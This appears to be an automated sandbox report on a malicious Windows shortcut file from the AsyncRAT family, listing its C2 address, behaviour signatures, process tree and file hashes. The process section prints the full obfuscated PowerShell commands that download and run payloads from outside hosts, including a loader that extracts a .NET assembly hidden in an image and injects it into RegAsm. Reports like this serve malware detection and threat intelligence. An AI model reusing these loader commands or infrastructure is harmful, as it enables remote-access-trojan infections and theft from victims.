Analysis

max time kernel
147s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted
11/11/2024, 15:37
Static task
static1
Behavioral task
behavioral1
Sample
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
Resource
win7-20240903-en
General

Target
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
Size
2KB
MD5
5358d8d8fe485972eb8115f7daf16080
SHA1
245e93bc84a9e8635732a8b9a9ed2e906a09f1c0
SHA256
d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa
SHA512
5808ab33e81962bc5252022357a2906651a84ad1cdcf007e5b21d0eb9ff1f08c9fde44d186a18c64e06e8c3ccb6b751de000e1877922dccb8cf7e6cc7996bf74
Malware Config

Extracted
Family
asyncrat
Version
1.0.7
Botnet
Default
C2
103.125.189.155:8848
Mutex
DcRatMutex_adxzvxv
delay
1
install
false
install_folder
%AppData%
Signatures

Asyncrat family

Blocklisted process makes network request  5 IoCs
flow  pid   Process
6     2140  powershell.exe
20    4588  powershell.exe
22    4588  powershell.exe
28    4588  powershell.exe
30    5028  powershell.exe

Command and Scripting Interpreter: PowerShell  5 IoCs
pid   Process
4840  powershell.exe
4588  powershell.exe
1360  powershell.exe
2140  powershell.exe
5028  powershell.exe

Checks computer location settings  2 TTPs  1 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation  cmd.exe

Drops startup file  2 IoCs
description                   ioc  Process
File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INTEL02.bat  cmd.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INTEL02.bat  cmd.exe

Legitimate hosting services abused for malware hosting/C2  1 TTPs  2 IoCs
flow  ioc
19    bitbucket.org
20    bitbucket.org

Suspicious use of SetThreadContext  1 IoCs
description                         pid   Process         procid_target
PID 4588 set thread context of 224  4588  powershell.exe  106

Enumerates physical storage devices  1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery  1 TTPs  1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  RegAsm.exe

Checks processor information in registry  2 TTPs  3 IoCs
Processor information is often read in order to detect sandboxing environments.
description        ioc  Process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0  WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WINWORD.EXE

Enumerates system info in registry  2 TTPs  3 IoCs
description        ioc  Process
Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS  WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  WINWORD.EXE
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WINWORD.EXE

Modifies registry class  1 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings  powershell.exe

Suspicious behavior: AddClipboardFormatListener  2 IoCs
pid   Process
3296  WINWORD.EXE
3296  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses  11 IoCs
pid   Process
1360  powershell.exe
1360  powershell.exe
2140  powershell.exe
2140  powershell.exe
4840  powershell.exe
4840  powershell.exe
4588  powershell.exe
4588  powershell.exe
5028  powershell.exe
5028  powershell.exe
5028  powershell.exe

Suspicious use of AdjustPrivilegeToken  48 IoCs
description                          pid   Process
Token: SeDebugPrivilege              1360  powershell.exe
Token: SeDebugPrivilege              2140  powershell.exe
Token: SeIncreaseQuotaPrivilege      100   WMIC.exe
Token: SeSecurityPrivilege           100   WMIC.exe
Token: SeTakeOwnershipPrivilege      100   WMIC.exe
Token: SeLoadDriverPrivilege         100   WMIC.exe
Token: SeSystemProfilePrivilege      100   WMIC.exe
Token: SeSystemtimePrivilege         100   WMIC.exe
Token: SeProfSingleProcessPrivilege  100   WMIC.exe
Token: SeIncBasePriorityPrivilege    100   WMIC.exe
Token: SeCreatePagefilePrivilege     100   WMIC.exe
Token: SeBackupPrivilege             100   WMIC.exe
Token: SeRestorePrivilege            100   WMIC.exe
Token: SeShutdownPrivilege           100   WMIC.exe
Token: SeDebugPrivilege              100   WMIC.exe
Token: SeSystemEnvironmentPrivilege  100   WMIC.exe
Token: SeRemoteShutdownPrivilege     100   WMIC.exe
Token: SeUndockPrivilege             100   WMIC.exe
Token: SeManageVolumePrivilege       100   WMIC.exe
Token: 33                            100   WMIC.exe
Token: 34                            100   WMIC.exe
Token: 35                            100   WMIC.exe
Token: 36                            100   WMIC.exe
Token: SeIncreaseQuotaPrivilege      100   WMIC.exe
Token: SeSecurityPrivilege           100   WMIC.exe
Token: SeTakeOwnershipPrivilege      100   WMIC.exe
Token: SeLoadDriverPrivilege         100   WMIC.exe
Token: SeSystemProfilePrivilege      100   WMIC.exe
Token: SeSystemtimePrivilege         100   WMIC.exe
Token: SeProfSingleProcessPrivilege  100   WMIC.exe
Token: SeIncBasePriorityPrivilege    100   WMIC.exe
Token: SeCreatePagefilePrivilege     100   WMIC.exe
Token: SeBackupPrivilege             100   WMIC.exe
Token: SeRestorePrivilege            100   WMIC.exe
Token: SeShutdownPrivilege           100   WMIC.exe
Token: SeDebugPrivilege              100   WMIC.exe
Token: SeSystemEnvironmentPrivilege  100   WMIC.exe
Token: SeRemoteShutdownPrivilege     100   WMIC.exe
Token: SeUndockPrivilege             100   WMIC.exe
Token: SeManageVolumePrivilege       100   WMIC.exe
Token: 33                            100   WMIC.exe
Token: 34                            100   WMIC.exe
Token: 35                            100   WMIC.exe
Token: 36                            100   WMIC.exe
Token: SeDebugPrivilege              4840  powershell.exe
Token: SeDebugPrivilege              4588  powershell.exe
Token: SeDebugPrivilege              5028  powershell.exe
Token: SeDebugPrivilege              224   RegAsm.exe

Suspicious use of SetWindowsHookEx  7 IoCs
pid   Process
3296  WINWORD.EXE
3296  WINWORD.EXE
3296  WINWORD.EXE
3296  WINWORD.EXE
3296  WINWORD.EXE
3296  WINWORD.EXE
3296  WINWORD.EXE

Suspicious use of WriteProcessMemory  28 IoCs
description                         pid   Process         procid_target
PID 5112 wrote to memory of 1360    5112  cmd.exe         84
PID 5112 wrote to memory of 1360    5112  cmd.exe         84
PID 1360 wrote to memory of 1340    1360  powershell.exe  85
PID 1360 wrote to memory of 1340    1360  powershell.exe  85
PID 1340 wrote to memory of 2140    1340  cmd.exe         86
PID 1340 wrote to memory of 2140    1340  cmd.exe         86
PID 2140 wrote to memory of 1624    2140  powershell.exe  90
PID 2140 wrote to memory of 1624    2140  powershell.exe  90
PID 1624 wrote to memory of 100     1624  cmd.exe         91
PID 1624 wrote to memory of 100     1624  cmd.exe         91
PID 1624 wrote to memory of 1696    1624  cmd.exe         92
PID 1624 wrote to memory of 1696    1624  cmd.exe         92
PID 1624 wrote to memory of 4840    1624  cmd.exe         94
PID 1624 wrote to memory of 4840    1624  cmd.exe         94
PID 4840 wrote to memory of 4588    4840  powershell.exe  95
PID 4840 wrote to memory of 4588    4840  powershell.exe  95
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 4588 wrote to memory of 224     4588  powershell.exe  106
PID 1624 wrote to memory of 5028    1624  cmd.exe         107
PID 1624 wrote to memory of 5028    1624  cmd.exe         107
PID 5028 wrote to memory of 3296    5028  powershell.exe  109
PID 5028 wrote to memory of 3296    5028  powershell.exe  109

Processes

C:\Windows\system32\cmd.exe  [depth 1]
cmd /c C:\Users\Admin\AppData\Local\Temp\d2ef48c59444db481a238f32b6fb35abee02165fa1b0bf63080f9b89728d7cfa.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1360

C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c POwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==3⤵
- Suspicious use of WriteProcessMemory
PID: 1340

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwerSHeLl -EX byPasS -nop -W hIdden -EC IAAJAEkAVwByACAACQAJAC0AVQBSAEkAIAAJAAkACQAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvAEQAQwAwADkALgBiAGEAdAAgAB0gIAAJAC0ATwBVAHQAZgBpAEwARQAgACAAHSAkAEUATgBWADoAYQBwAFAAZABBAHQAYQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdICAACQAJAAkAOwAgAAkAaQBFAHgAIAAgACAAHSAkAGUAbgBWADoAQQBwAFAARABBAFQAQQBcAEkATgBUAEUATAAwADIALgBiAGEAdAAdIA==4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2140

C:\Windows\system32\cmd.exe  [depth 5]
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\INTEL02.bat""
- Drops startup file
- Suspicious use of WriteProcessMemory
PID: 1624

C:\Windows\System32\Wbem\WMIC.exe  [depth 6]
wmic cpu get name
- Suspicious use of AdjustPrivilegeToken
PID: 100

C:\Windows\system32\find.exe  [depth 6]
find "QEMU"
PID: 1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#Z#By#DM#N#B3#Gc#Z#Bz#GY#ZwBz#C8#ZgBz#GQ#ZgBz#GQ#cw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##x#Dc#Jw#s#C##JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GQ#YQBy#Gs#bQBh#G4#YQBn#GU#cg#v#GQ#YQBy#Gs#bw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#d#Bl#HM#d#Bf#Gk#bQBn#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##
J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##
WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#Go#YQBm#GI#c#BT#Gs#Lw#y#DY#Lg#y#D##MQ#u#D##Mg#u#DM#M##x#C8#Lw#6#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('#','A')));powershell.exe $OWjuxD"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hdr34wgdsfgs/fsdfsds/downloads/test_img.jpg?14417', 'https://bitbucket.org/darkmanager/darko/downloads/test_img.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.jafbpSk/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4588

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  [depth 8]
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID: 224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 5028

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE  [depth 7]
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\donhang.docx" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID: 3296

Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD57d4fd0768b8cba2af39bf88ba789e27a
SHA131315e8bc69d8ff9d3764071b0c9def830dabf58
SHA256bac0b67b6a6ffaea1aa1cd97802e9e7f45f6ab68f60dc4ebd71f943848530838
SHA512101971fafe90fa9e703bb4d62208f984fe3162044bf30b2ed16f5cd9dc16d2e9a9770fccd37cfee3796b4f222035418dc0ab79df1a99faeb385889341972c754
-
Filesize
266B
MD586493b936f7da8c56ca1aa58bb7a7e9a
SHA1fc7cae515fde493541be88881c285d712db7212c
SHA2564d6282ece4e6047126c782e717ddd21adbb311412b9ac8ce65c4e3650871a47d
SHA51258b37f2dbf86e9754df24df81b37ab4336459f47b24cb39457e7c0097e9c3e9ded43cdb3d0517944f5d7022750f1fe5d29e44054982c5dbedadf1a8e8c8cf859
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize
684B
MD5f503b3b384c5bd135f5a190d720f198b
SHA13056a2c90ac0acb51e030e355d1a6cb6557ea766
SHA2565e1938be5ff643525fb28ae0e8118d88dc34fe60745447fa1af2575dfb2e449f
SHA51229fbd1260a67c2e3b36e3c9d7608ec79ca5caa759688234a23f2c9ebb88bfa8e81f7984f82abd806c360097be16764faf10bd6f8c2d8242ba3cdd426aa48c0c3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize
1KB
MD59055dde56adc3490f91b8446684aa69a
SHA18df9f63b4290c52bdda40ad376b2910b4b85fb29
SHA25653033b1796646896f00b287d700ba51170ad2d4456527975ffd12eb39603a1fc
SHA512ecb76ab8fbfaacf81e39e9ab352f9a92dbf5d94d879609a5c40407410cb6fd7ac0326f77f2938047f9e7bfe5a75acdb270e3d78956c353ec2b0b7a0dab017025
-
Filesize
12KB
MD5ff3620557b65e6e8dd8816643d785c5a
SHA1d5021480b7cac2066462829c53dc18615642c579
SHA25685225d3c39423bbfc05e9d52351a9b00670fee3565457e5c3f75caac27ca4de9
SHA512c2a842bfa4f3caf50d58d5707ca0ad978e04e5111fe20ad468282c216567d25da7022fb7ff2681cb72acc8add3cbcf37000b6bde06ad252758f6ff06c9fb3d34